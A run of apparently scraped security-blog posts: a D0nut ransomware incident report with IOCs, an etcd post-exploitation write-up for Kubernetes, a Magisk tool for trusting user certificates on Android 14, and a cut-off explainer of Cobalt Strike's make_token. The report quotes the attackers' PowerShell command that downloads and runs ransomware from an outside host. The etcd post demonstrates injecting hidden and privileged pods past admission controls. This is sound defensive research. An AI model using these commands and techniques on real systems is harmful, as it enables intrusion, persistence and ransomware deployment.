  • Leveraging a BYOVD to terminate system-level processes which may interfere with the deployment of ransomware.  
  • Use of RDP to perform lateral movement and browse folders to identify data for exfiltration.  
  • Data exfiltration over SFTP using Rclone.  
  • Deployment of D0nut ransomware.  

D0nut

D0nut leaks is a group that emerged during Autumn of 2022 and was initially reported to be performing intrusions into networks with an aim of exfiltrating data which they would then hold to ransom, without encrypting any files1.  Further down the line, the group were seen adopting the double-extortion approach2. This includes encrypting files and holding the decryption key for ransom, as well as threatening to publish the stolen data should the ransom demand not be met.   

Numerous potential links have been made to other ransomware groups and affiliates, with the ransomware encryptor reportedly sharing similarities with the HelloXD ransomware strain. Indications of a link were observed through the filenames of the ransomware executable deployed throughout the incident, with the filenames being xd.exe and wxd7.exe. However, it should be noted that this alone is not compelling evidence to indicate a link between the ransomware strains.  

Incident Overview  

Once the threat actor had gained their foothold within the network, they conducted lateral movement with a focus on the following objectives: 

  • Compromise a host which stores sensitive data which can be targeted for exfiltration.  
  • Compromise a domain controller.  

Cobalt Strike was heavily utilised to deploy Beacon, the payload generated by Cobalt Strike, to multiple hosts on the network so the threat actor could extend their access and visibility. 

A Remote Desktop Protocol (RDP) session was established to a file server, which allowed the threat actor to browse the file system and identify folders of interest to target for exfiltration. Data exfiltration was conducted using Rclone to upload files to a Secure File Transfer Protocol (SFTP) server controlled by the threat actor. Rclone allows for uploading of files directly from folders to cloud storage, meaning the threat actor did not need to perform any data staging prior to the upload.  

Before deploying the ransomware, the threat actor deployed malware capable of leveraging a driver, which has been used by other ransomware groups3, to terminate any anti-virus (AV) or endpoint detection and response (EDR) processes running on the system; this technique is known as bring your own vulnerable driver (BYOVD). Additionally, the threat actor modified a pre-existing group policy object (GPO) and appended configuration that would prevent Windows Defender from interfering with any malware that was dropped on the systems.  

Ransomware was deployed to both user workstations and servers on the compromised domain. An ESXi server was also impacted, resulting in the hosted virtual machines suffering encryption that was performed at the hypervisor level.  

The total time from initial access to encryption is believed to be less than a week.  

TTPs 

Lateral Movement 

The following methods were utilised to move laterally throughout the victim network: 

  • Cobalt Strike remotely installed temporary services on targeted hosts which executed Beacon, triggering a call back to the command and control (C2) server and providing the operator access to the system. An example command line of what the services were configured to run is provided below:

A service was installed in the system.  

Service Name: <random alphanumeric characters> 

Service File Name: \\<target host>\ADMIN$\<random alphanumeric characters>.exe  

Service Type: user mode service  

Service Start Type: demand start  

Service Account: LocalSystem 

  • RDP sessions were established using compromised domain accounts.  
  • PsExec was also used to facilitate remote command execution across hosts. 

Persistence

The threat actor used SystemBC to establish persistence within the environment. The malware was set to execute whenever a user logs in to the system, which was achieved by modifying the registry key Software\Microsoft\Windows\CurrentVersion\Run within the DEFAULT registry hive (please note this is not referring to the hive located at C:\Users\DEFAULT\NTUSER.dat, but the hive located at C:\Windows\System32\config\DEFAULT). An entry was created under the run key which ran the following command, resulting in execution of SystemBC: 

powershell.exe -windowstyle hidden -Command ” ‘C:\programdata\explorer.exe'” 

Defense Evasion

As part of their efforts to evade interference from security software, the threat actor made use of two files, d.dll and def.exe, which were responsible for dropping the vulnerable driver RTCore64.sys, which has reportedly been exploited by other ransomware groups to disable AV and EDR solutions. The files were dropped in the following folders: 

  • C:\temp\ 
  • C:\ProgramData\ 

Analysis of def.exe identified that the program escalated privileges via process injection, allowing it to terminate any system-level processes not present in its internally stored whitelist.   

The threat actor took additional measures by appending registry configurations to a pre-existing GPO that would disable detection and prevention functionality of Windows Defender. Exclusions for all files with a .exe or .dll extension were also set, along with exclusions for files within the C:\ProgramData\ and C:\directories. The below configuration was applied across all hosts present on the compromised domain:  

Figure 1 Parsed Registry.pol showing malicious configuration added by the threat actor

Command and Control

Cobalt Strike Beacons were heavily utilised to maintain a presence within the network and to extend access via lateral movement.  

SystemBC was also deployed sparingly and appeared to be purely for establishing persistence within the network. SystemBC is a commodity malware backdoor which leverages SOCKS proxying for covert channelling of C2 communications to the operator. Serving as a proxy, SystemBC becomes a conduit for other malware deployed by threat actors to tunnel C2 traffic. Additionally, certain variants facilitate downloading and execution of further payloads, such as shellcode or PowerShell scripts issued by the threat actor.  

Analysis of the executable identified the following IP addresses which are contacted on port 4001 to establish communications with the C2 server: 

  • 85.239.52[.]7  
  • 194.87.111[.]29  

Exfiltration  

Rclone, an open-source file cloud storage program heavily favoured by threat actors to perform data exfiltration, was deployed once the threat actor had identified a system which hosted data of interest. Through recovering the Rclone configuration file located at C:\User\<user>\AppData\Roaming\rclone.conf, the SFTP server 83.149.93[.]150 was identified as the destination of the exfiltrated data.  

Initially deployed as rclone.exe, the threat actor swiftly renamed the file to explorer.exe in an attempt to blend in. However, due to the file residing in the File Server Resource Manager (FSRM) folder C:\StorageReports\Scheduled\, this artefact was highly noticeable.  

Impact

Ransomware was deployed to workstations and servers once the threat actor had exfiltrated data from the network to use as leverage in the forthcoming ransom demands. The ransomware also impacted an ESXi server, encrypting the hosted virtual machines at the hypervisor level.  

Volume shadow copies for a data drive of a file server were purged by the threat actor preceding the ransomware execution.   

The ransomware was downloaded and executed via the following PowerShell command: 

powershell.exe iwr -useb hxxp[:]//ix[.]io/4uD0 -outfile xd.exe ; .\xd.exe debug defgui 

In some other instances, the ransomware was deployed as wxd7.exe. The ransomware executables were observed being executed from the following locations (however it is likely that the folders may vary from case to case and the threat actor uses any folders in the root of C:\): 

  • C:\Temp\ 
  • C:\ProgramData\ 
  • C:\storage\ 
  • C:\StorageReports\

During analysis of the ransomware executable, the following help message was derived which provides command line arguments for the program: 

Figure 2 Help message contained within the ransomware executable

A fairly unique ransom note is dropped after the encryption process in the form of a HTML file named readme.html: 

Figure 3 Ransomware readme note

Recommendations  

  1. Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.  
  1. Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the Hypervisors.  
  1. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.     
  1. Monitor firewalls for anomalous spikes in data leaving the network. 
  1. Apply Internet restrictions to servers so that they can only establish external communications with known good IP addresses and domains that are required for business operations. 

If you have been impacted by D0nut, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 331 630 0690 or email [email protected]

Indicators Of Compromise  

IOC Value Indicator Type Description  
hxxp[:]//ix[.]io/4uD0 URL Hosted ransomware executable – xd.exe 
85.239.52[.]7:4001 IP:PORT SystemBC C2 
194.87.111[.]29:4001 IP:PORT SystemBC C2 
83.149.93[.]150 IP Address SFTP server used for data exfiltration 
eb876e23dbbfe44c7406fcc7f557ee772894cc0b SHA1 Ransomware executable – wxd7.exe 
d4832169535e5d91b91093075f3b10b96973a250 SHA1 SystemBC executable – explorer.exe 
550cd82011df93cc89dc0431fa13150707d6aca2 SHA1 Used to kill AV and EDR processes – def.exe 
f6f11ad2cd2b0cf95ed42324876bee1d83e01775 SHA1 Used to kill AV and EDR processes – RTCore.sys 
C:\ProgramData\xd.exe C:\temp\xd.exe C:\storage\xd.exe C:\Temp\wxd7.exe C:\ProgramData\wxd7.exe C:\storage\wxd7.exe C:\StorageReports\wxd7.exe File Path Ransomware executable 
C:\ProgramData\explorer.exe File Path SystemBC 
C:\StorageReports\Scheduled\explorer.exe  File Path Rclone 
C:\ProgramData\def.exe C:\temp\def.exe C:\ProgramData\d.dll C:\temp\d.dll File Path Used to kill AV and EDR processes 

MITRE ATT CK®

Tactic Technique ID Description  
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to execute malicious commands  
Execution  System Services: Service Execution T1569.002 Cobalt Strike remotely created temporary services to execute its payload 
Execution  System Services: Service Execution T1569.002 PsExec creates a service to perform it’s execution 
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 SystemBC created a run key entry to establish persistence.    
Privilege Escalation  Process Injection: Portable Executable Injection T1055.002 def.exe achieved privilege escalation through process injection 
Defense Evasion  Impair Defenses: Disable or Modify Tools T1562.001 The threat actor modified a legitimate GPO to disable Windows Defender functionality 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 def.exe and d.dll were deployed to terminate EDR and AV services 
Lateral Movement SMB/Admin Windows Shares T1021.002 Cobalt Strike targeted SMB shares for lateral movement 
Lateral Movement SMB/Admin Windows Shares T1021.002 PsExec uses SMB shares to execute processes on remote hosts 
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used to establish sessions to other hosts on the network  
Command and Control Proxy: External Proxy T1090.002 SystemBC communicates with its C2 server via proxies 
Exfiltration  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 The threat actor exfiltrated data to an SFTP server 
Impact  Inhibit System Recovery T1490 Volume shadow copies for a file server were deleted prior to encryption from the ransomware 
Impact Data Encrypted for Impact T1486 Ransomware was deployed to the estate and impacted both servers and user workstations 
Impact Data Encrypted for Impact T1486 Virtual machines hosted on an ESXi server were encrypted at the hypervisor level 

Post-exploiting a compromised etcd – Full control over the cluster and its nodes

7 November 2023 at 08:00

Kubernetes is essentially a framework of various services that make up its typical architecture, which can be divided into two roles: the control-plane, which serves as a central control hub and hosts most of the components, and the nodes or workers, where containers and their respective workloads are executed.

Within the control plane we typically find the following components:

  • kube-apiserver: This component acts as the brain of the cluster, handling requests from clients (such as kubectl) and coordinating with other components to ensure their proper functioning.
  • scheduler: Responsible for determining the appropriate node to deploy a given pod to.
  • control manager: Manages the status of nodes, jobs or service accounts.
  • etcd: A key-value store that stores all cluster-related data.

Inside the nodes we typically find:

  • kubelet: An agent running on each node, responsible for keeping the pods running and in a healthy state.
  • kube-proxy: Exposes services running on pods to the network.

When considering the attack surface in Kubernetes, we consider certain unauthenticated components, such as the kube-apiserver and kubelet, as well as leaked tokens or credentials that grant access to certain cluster features, and non-hardened containers that may provide access to the underlying host. However, when discussing etcd, it is often perceived solely as an information storage element within the cluster from which secrets can be extracted. However, etcd is much more than that.

What is etcd and how it works?

Etcd, which is an external project to the core of Kubernetes, is a non-relational key-value database that stores all the information about the cluster, including pods, deployments, network policies, roles, and more. In fact, when performing a cluster backup, what is actually done is a dump of etcd, and during a restore operation, this is also done through this component. Given its critical role in the Kubernetes architecture, can’t we use it for more than just extracting secrets?

Its function as a key-value database is straightforward. Entries can be added or edited using the put command, the value of keys can be retrieved using get, deletions can be performed using delete, and a directory tree structure can be created:

$ etcdctl put /key1 value1
OK
$ etcdctl put /folder1/key1 value2
OK
$ etcdctl get / --prefix --keys-only
/folder1/key1
/key1
$ etcdctl get /folder1/key1
/folder1/key1
value2

How kubernetes uses etcd: Protobuf

While the operation of etcd is relatively straightforward, let’s take a look at how Kubernetes injects its resources into the database, such as a pod. Let’s create a pod and extract its entry from etcd:

$ kubectl run nginx --image nginx
pod/nginx created
$ kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          20s*
$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 --cert=/etc/kubernetes/pki/etcd/server.crt --key=/etc/kubernetes/pki/etcd/server.key --cacert=/etc/kubernetes/pki/etcd/ca.crt get /registry/pods/default/nginx
/registry/pods/default/nginx
k8s

v1Pod�
�

nginx▒default"*$920c8c37-3295-4e66-ad4b-7b3ad57f2c192�퇣Z

runnginxbe
!cni.projectcalico.org/containerID@545434f9686cc9ef02b4dd16f6ddf13a89e819c25a30ed7c103a4ab8a86d7703b/
ni.projectcalico.org/podIP10.96.110.138/32b0
cni.projectcalico.org/podIPs10.96.110.138/32��
calicoUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:annotations":{".":{},"f:cni.projectcalico.org/containerID":{},"f:cni.projectcalico.org/podIP":{},"f:cni.projectcalico.org/podIPs":{}}}}Bstatus��

kubectl-runUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:labels":{".":{},"f:run":{}}},"f:spec":{"f:containers":{"k:{\\"name\\":\\"nginx\\"}":{".":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:terminationGracePeriodSeconds":{}}}B��
kubeletUpdate▒v�퇣FieldsV1:�
�{"f:status":{"f:conditions":{"k:{\\"type\\":\\"ContainersReady\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Initialized\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Ready\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}}},"f:containerStatuses":{},"f:hostIP":{},"f:phase":{},"f:podIP":{},"f:podIPs":{".":{},"k:{\\"ip\\":\\"10.96.110.138\\"}":{".":{},"f:ip":{}}},"f:startTime":{}}}Bstatus�
�
kube-api-access-b9xkqk�h
"

�▒token
(▒ 

kube-root-ca.crt
ca.crtca.crt
)'
%
        namespace▒
v1metadata.namespace��
nginxnginx*BJL
kube-api-access-b9xkq▒-/var/run/secrets/kubernetes.io/serviceaccount"2j/dev/termination-logrAlways����File▒Always 2
                                                                                                                   ClusterFirstBdefaultJdefaultR
                                                                                                                                                kind-worker2X`hr���default-scheduler�6
node.kubernetes.io/not-readyExists▒"    NoExecute(��8
node.kubernetes.io/unreachableExists▒"  NoExecute(�����PreemptLowerPriority▒�
Running#

InitializedTrue�퇣*2
ReadyTrue�퇣*2'
ContainersReadyTrue�퇣*2$

PodScheduledTrue�퇣*2▒"*
10.96.110.13�퇣B�
nginx

�퇣▒ (2docker.io/library/nginx:latest:_docker.io/library/nginx@sha256:480868e8c8c797794257e2abd88d0f9a8809b2fe956cbfbc05dcc0bca1f7cd43BMcontainerd://dbe056bb7be0dfb74a3f8dc6bd75441fe9625d2c56bd5fcd988b780b8cb6884eHJ
BestEffortZb
10.96.110.138▒"

As you can see, the data extracted from the pod in etcd is not just alphanumeric characters. This is because Kubernetes serialises the data using protobuf.

Protobuf, short for Protocol Buffers, is a data serialisation format developed by Google that is independent of programming languages. It enables efficient communication and data exchange between different systems. Protobuf uses a schema or protocol definition to define the structure of the serialised data. This schema is defined using a simple language called the Protocol Buffer Language.

For example, let’s consider a protobuf message to represent data about a person. We would define the structure of the protobuf message as follows:

syntax = "proto3";

message Person {
  string name = 1;
  int32 age = 2;
  string email = 3;
}

If we wanted to serialise other types of data, such as car or book data, the parameters required to define them would be different to those required to define a person. The same principle is true for Kubernetes. In Kubernetes, multiple resources can be defined, such as pods, roles, network policies, and namespaces, among others. While they share a common structure, not all of them can be serialised in the same way, as they require different parameters and definitions. Therefore, different schemas are required to serialise these different objects.

Fortunately, there is auger, an application developed by Joe Betz, a technical staff member at Google. Auger collects the Kubernetes source code and all the schemas, allowing the serialisation and deserialisation of data stored in etcd into YAML and JSON formats. At NCC Group, we have created a wrapper for auger called kubetcd to demonstrate the potential criticality of a compromised etcd through a proof of concept (PoC).

Limitations

As a post-exploitation technique, this approach has several limitations. The first and most obvious is that we would need to have compromised the host running the etcd service as root. This is necessary because we need access to the following certificates in order to authenticate to the etcd service, which are typically only exposed on localhost. The default paths used by most installation scripts are:

  • /etc/kubernetes/pki/etcd/ca.crt
  • /etc/kubernetes/pki/etcd/server.crt
  • /etc/kubernetes/pki/etcd/server.key (this is only readable by root)

A second limitation is that we would need to have the desired items already present in the cluster in order to use them as templates, especially for those that execute, such as pods. This is necessary because there is execution metadata that is added once the build request has passed through the kube-apiserver, and occasionally there is third-party data (e.g. Calico) that is not typically included in a raw manifest.

The third and final limitation is that this technique is only applicable to self-managed environments, which can include on-premises or virtual instances in the cloud. Cloud providers that offer managed Kubernetes are responsible for managing and securing the control plane, which means that access to not only etcd but also the scheduler or control manager is restricted and users cannot interact with them. Therefore, this technique is not suitable for managed environments.

Injecting resources and tampering data

Recognising that data entry is done through serialisation with protobuf using different schemas, the kubetcd wrapper aims to emulate the typical syntax of the native kubectl client. However, when interacting directly with etcd, many fields that are managed by the logic of the kube-apiserver can be modified without restriction. A simple example would be the timestamp, which indicates the creation date and time of a pod:

root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          38s
root@kind-control-plane:/# kubetcd create pod nginx -t nginx --time 2000-01-31T00:00:00Z
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/nginx
OK
root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          23y

Changing the timestamp of a newly created Pod would help to make it appear, beyond what is shown in the event logs, as if it had been running in the cluster for a certain period of time. This could give any administrator pause as to whether it would be appropriate to delete it or whether it would affect any services.

Persistence

Now that we know we can tamper with the startup date of a pod, we can explore modifying other parameters, such as changing the path in etcd to gain persistence in the cluster. When we create a pod named X, it is injected into etcd at the path /registry/pods/<namespace>/X. However, with direct access to etcd, we can make the pod name and its path in the database not match, which will prevent it from being deleted by the kube-apiserver:

root@kind-control-plane:/# kubetcd create pod nginxpersistent -t nginx -p randomentry
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/randomentry
OK
root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl delete pod nginxpersistent
Error from server (NotFound): pods "nginxpersistent" not found

Taking this a step further, it is possible to create inconsistencies in pods by manipulating not only the pod name, but also the namespace. By running pods in a namespace that does not match the entry in etcd, we can make them semi-hidden and difficult to identify or manage effectively:

root@kind-control-plane:/# kubetcd create pod nginx_hidden -t nginx -n invisible --fake-ns
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/invisible/nginx_hidden
OK

Note that with --fake-ns, the invisible namespace is only used for the etcd injection path, but the default namespace has not been replaced in its manifest. Because of this inconsistency, the pod will not appear when listing the default namespace, and the invisible namespace will not be indexed. This pod will only appear when all resources are listed using --all or -A:

root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get namespaces
NAME                 STATUS   AGE
default              Active   13m
kube-node-lease      Active   13m
kube-public          Active   13m
kube-system          Active   13m
local-path-storage   Active   13m
root@kind-control-plane:/# kubectl get pods -A | grep hidden
default              nginx_hidden  1/1     Running   0   23y

By manipulating the namespace entry in etcd, we can create pods that appear to run in one namespace, but are actually associated with a different namespace defined in their manifest. This can cause confusion and make it difficult for administrators to accurately track and manage pods within the cluster.

These are just a few basic examples of directly modifying data in etcd, specifically in relation to pods. However, the possibilities and combinations of these techniques can lead to other interesting scenarios.

Bypassing AdmissionControllers

Kubernetes includes several elements for cluster hardening, specifically for pods and their containers. The most notable elements are:

  • SecurityContext, which allows, among other things, preventing a pod from running as root, mounting filesystems in read-only mode, or blocking capabilities.
  • Seccomp, which is applied at the node level and restricts or enables certain syscalls.
  • AppArmor, which provides more granular syscall management than Seccomp.

However, all of these hardening features may require policies to enforce their use, and this is where Admission Controllers come into play. There are several types of built-in admission controllers, and custom ones can also be created, known as webhook admission controllers. Whether built-in or webhook, they can be of two types:

  • Validation: They accept or deny the deployment of a resource based on the defined policy. For example, the NamespaceExist Admission Controller denies the creation of a resource if the specified namespace does not exist.
  • Mutation: These modify the resource and the cluster to allow its deployment. For example, the NamespaceAutoProvision Admission Controller checks resource requests to be deployed in a namespace and creates the namespace if it does not exist.

There is a built-in validation type Admission Controller that enforces the deployment of hardened pods, known as the Pod Security Admission (PSA). This Admission Controller supports three predefined levels of security, known as the Pod Security Standard, which are detailed in the official Kubernetes documentation. In summary, they are as follows:

  • Privileged: No restrictions. This policy would allow you to have all permissions to perform a pod breakout.
  • Baseline: This policy applies a minimum set of hardening rules, such as restricting the use of host-shared namespaces, using AppArmor, or allowing only a subset of capabilities.
  • Restricted: This is the most restrictive policy and applies almost all available hardening options.

PSAs replace the obsolete Pod Security Policies (PSP) and are applied at the namespace level, so all pods deployed in a namespace where these policies are defined are subject to the configured pod security standard.

It is worth noting that these PSAs apply equally to all roles, so even a cluster admin could not circumvent these restrictions unless they regenerated the namespace by disabling these policies:

root@kind-control-plane:/# kubectl get ns restricted-ns -o yaml
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2023-05-23T10:20:22Z"
  labels:
    kubernetes.io/metadata.name: restricted-ns
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
  name: restricted-ns
  resourceVersion: "3710"
  uid: 2277ebac-e487-4d59-8a09-97bef27cc0d9
spec:
  finalizers:
  - kubernetes
status:
  phase: Active

root@kind-control-plane:/# kubectl run nginx --image nginx -n restricted-ns
Error from server (Forbidden): pods "nginx" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "nginx" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "nginx" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "nginx" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "nginx" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")

As expected, not even a cluster administrator is allowed to deploy a pod without meeting all the security requirements imposed by the PSA. However, it is possible to inject privileged pods into namespaces restricted by PSAs using etcd:

root@kind-control-plane:/# kubetcd create pod nginx_privileged -t nginx -n restricted-ns -P
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Privileged SecurityContext Added
Path injected: /registry/pods/restricted-ns/nginx_privileged
OK
root@kind-control-plane:/# kubectl get pods -n restricted-ns
NAME               READY   STATUS    RESTARTS   AGE
nginx_privileged   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get pod nginx_privileged -n restricted-ns -o yaml | grep "restricted\\|privileged:"
    namespace: restricted-ns
        privileged: true

Being able to deploy unrestricted privileged pods it would be easy to get a shell on the underlying node. This demonstrates that gaining write access to an etcd node, whether deployed as a pod within the cluster, as a local service in the control plane or as an isolated node as part of an etcd cluster, could compromise the kubernetes cluster and all its underlying infrastructure.

Why this works?

When working with the regular client, kubectl, it sends all requests directly to the kube-apiserver, where processes are executed in the following order: authentication, authorisation and Admission Controllers. Once the request has been authenticated, authorised and filtered through the admission controllers, the kube-apiserver redirects the request to the other components of the cluster to organise the provisioning of the desired resource. In other words, the kube-apiserver is not only the entry point to the cluster, but also applies all the controls for accessing it.

However, by injecting these resources directly into etcd, we bypass all these controls because the request does not go from the client to the kube-apiserver, but from the database in the backend where the cluster elements are stored. As the current architecture of Kubernetes is designed, it places trust in etcd, assuming that if an element is already in the database, it has already passed all the controls imposed by the kube-apiserver.

Mitigating the threat

Despite the capabilities of this post-exploitation technique, it would be easily detectable, especially if we seek to obtain shells on the nodes, mainly by third-party runtime security solutions with good log ingest times, such as Falco or some EDRs, which run at the node level.

However, as already demonstrated, gaining access to the nodes would be a simple task, and since most container engines run as root by default, and with the user namespace disabled, we would get a direct shell as root in most cases. This would allow us to manipulate host services and processes, be they EDRs or agents for sending logs. Enabling user namespace, using container sandboxing technologies or setting the container engine to rootless mode could help mitigate this attack vector.

Conclusions

The state-of-the-art regarding the attack surface in a Kubernetes cluster has been defined for some time, focusing on elements such as unauthenticated kube-apiserver or kubelet services, leaked tokens or credentials, and various pod breakout techniques. Most of the techniques described so far in relation to etcd have focused primarily on the extraction of secrets and the lack of encryption of data at rest.

This paper aims to demonstrate that a compromised etcd is the most critical element within the cluster, as it is not subject to role restrictions or the AdmissionControllers. This makes it easy to compromise not only the cluster itself, but also its underlying infrastructure, including all the nodes on which a kubelet is deployed.

This should make us rethink the implementation of etcd and its reliability within the cluster by implementing additional mechanisms that ensure data integrity.

Tool Release: Magisk Module – Conscrypt Trust User Certs

8 November 2023 at 14:31

Overview

Android 14 introduced a new feature which allows to remotely install CA certificates. This change implies that instead of using the /system/etc/security/cacerts directory to check the trusted CA’s, this new feature uses the com.android.conscrypt APEX module, and reads the certificates from the directory /apex/com.android.conscrypt/cacerts.

Inspired by this blog post by Tim Perry, I decided to create a Magisk module that would automate the work required to intercept traffic on Android 14 with tooling such as Burp Suite, and that uses the installed user certificates in a similar fashion as the MagiskTrustUserCerts module does.

This Magisk module makes all installed user CA’s part of the Conscrypt APEX module’s CA certificates, so that they will automatically be used when building the trust chain on Android 14.

The Magisk module is available for download from https://github.com/nccgroup/ConscryptTrustUserCerts

Note: It should be noted that if an application has implemented SSL Pinning, it would not be possible to intercept the HTTPS traffic.

APEX: A quick overview

The Android Pony EXpress (APEX) container format was introduced in Android 10 and it is used in the install flow for lower-level system modules. This format facilitates the updates of system components that do not fit into the standard Android application model. Some example components are native services and libraries, hardware abstraction layers (HALs), runtime (ART), and class libraries.

With the introduction of APEX, system libraries in Android can be updated individually like Android apps. The main benefit of this is that system components can be individually updated via the Android Package Manager instead of having to wait for a full system update.

Source: https://source.android.com/docs/core/ota/apex

What is Conscrypt?

The Conscrypt module (com.android.conscrypt) is distributed as an APEX file and it is used as a Java Security Provider. On Android 14, an updatable root trust store has been introduced within Conscrypt. This allows for faster CA updates allowing to revoke trust of problematic or failing CAs on all Android 14 devices.

Source: https://source.android.com/docs/core/ota/modular-system/conscrypt

Creating the Magisk module

The script that appears on Tim Perry’s blog post was used as the template for the module, but some modifications were required in order to use it as a Magisk module.

In Magisk, boot scripts can be run in 2 different modes: post-fs-data and late_start service mode. As it was required that the Zygote process was started, the boot script was set to be run in the late_start service mode.

To ensure that the boot process was completed before we mounted our CA certificates over the Conscrypt directory inside Zygote’s mount namespace, the system property sys.boot_completed was used to check that the process finished, as it is set to 1 once the whole boot process is completed.

The following piece of code was added at the beginning of the script:

while [ "$(getprop sys.boot_completed)" != 1 ]; do
    /system/bin/sleep 1s
done

The script was also modified in order to use the user installed CA’s with the following code:

cp /data/misc/user/0/cacerts-added/* /data/local/tmp/tmp-ca-copy/

Once we had done the prior modifications, we had a functional Magisk module to intercept HTTPS traffic on Android 14.

Thanks to

Daniel Romero for his support throughout the research process.

Demystifying Cobalt Strike’s “make_token” Command

Introduction

If you are a pentester and enjoy tinkering with Windows, you have probably come across the following post by Raphael Mudge:

In this post, he explains how the Windows program runas works and how the netonly flag allows the creation of processes where the local identity differs from the network identity (the local identity remains the same, while the network identity is represented by the credentials used by runas).

Cobalt Strike provides the make_token command to achieve a similar result to runas /netonly.

If you are familiar with this command, you have likely experienced situations in which processes created by Beacon do not “inherit” the new token properly. The inner workings of this command are fairly obscure, and searching Google for something like “make_token cobalt strike” does not provide much valuable information (in fact, it is far more useful to analyse the implementations of other frameworks such as Sliver or Covenant).

Figure 2 - make_token documentation

In Raphael Mudge’s video Advanced Threat Tactics (6 of 9): Lateral Movement we can get more details about the command with statements like:

“If you are in a privileged context, you can use make_token in Beacon to create an access token with credentials”

“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”

Even though the description does not mention it, Raphael states that make_token requires an administrative context. However, if we go ahead and use the command with a non-privileged user… it works! What are we missing here?

Figure 3 - make_token from an unprivileged session

This post aims to shed more light on how the make_token command works, as well as its capabilities and limitations. This information will be useful in situations where you want to impersonate other users through their credentials with the goal of enumerating or moving laterally to remote systems.

It’s important to note that, even though we are discussing Cobalt Strike, this knowledge is perfectly applicable to any modern C2 framework. In fact, for the purposes of this post, we took advantage of the fact that Meterpreter did not have a make_token module to implement it ourselves.

An example of the new post/windows/manage/make_token module can be seen below:

Figure 4 - Meterpreter make_token module

You can find more information about our implementation in the following links:

Windows Authentication Theory

Let’s begin with some theory about Windows authentication. This will help in understanding how make_token works under the hood and addressing the questions raised in the introduction.

Local Security Context Network Security Context?

Let’s consider a scenario where our user is capsule.corp\yamcha and we want to interact with a remote system to which only capsule.corp\bulma has access. In this example, we have Bulma’s password, but the account is affected by a deny logon policy in our current system.

If we attempt to run a cmd.exe process with runas using Bulma’s credentials, the result will be something like this:

Figure 5 - runas fails due to deny log on policy

The netonly flag is intended for these scenarios. With this flag we can create a process where we remain Yamcha at the local level, while we become Bulma at the network level, allowing us to interact with the remote system.

Figure 6 - runas netonly works

In this example, Yamcha and Vegeta were users from the same domain and we could circumvent the deny log on policy by using the netonly flag. This flag is also very handy for situations where you have credentials belonging to a local user from a remote system, or to a domain user from an untrusted domain.

The fundamental thing to understand here is Windows will not validate the credentials you specify to runas /netonly, it will just make sure they are used when the process interacts with the network. That’s why we can bypass deny log on policies with runas /netonly, and also use credentials belonging to users outside our current system or from untrusted domains.   

Now… How does runas manage to create a process where we are one identity in the local system, and another identity in the network?

If we extract the strings of the program, we will see the presence of CreateProcessWithLogonW.

$ strings runas.exe | grep -i createprocess
CreateProcessAsUserW
CreateProcessWithLogonW

A simple lookup of the function shows that runas is probably using it to create a new process with the credentials specified as arguments.

Figure 7 - CreateProcessWithLogonW

Reading the documentation, we will find a LOGON_NETCREDENTIALS_ONLY flag which allows the creation of processes in a similar way to what we saw with netonly. We can safely assume that this flag is the one used by runas when we specify /netonly.

Figure 8 - Netonly flag

The Win32 API provides another function very similar to CreateProcessWithLogonW, but without the process creation logic. This function is called LogonUserA.

Figure 9 - LogonUserA

LogonUserA is solely responsible for creating a new security context from given credentials. This is the function that make_token leverages and is commonly used along with the LOGON32_LOGON_NEW_CREDENTIALS logon type to create a netonly security context (we can see this in the implementations of open source C2 frameworks).

Figure 10 - Netonly flag

To understand how it is possible to create a process with two distinct “identities” (local/network), it is fundamental to become familiar with two important components of Windows authentication: logon sessions and access tokens.

Logon Sessions Access Tokens

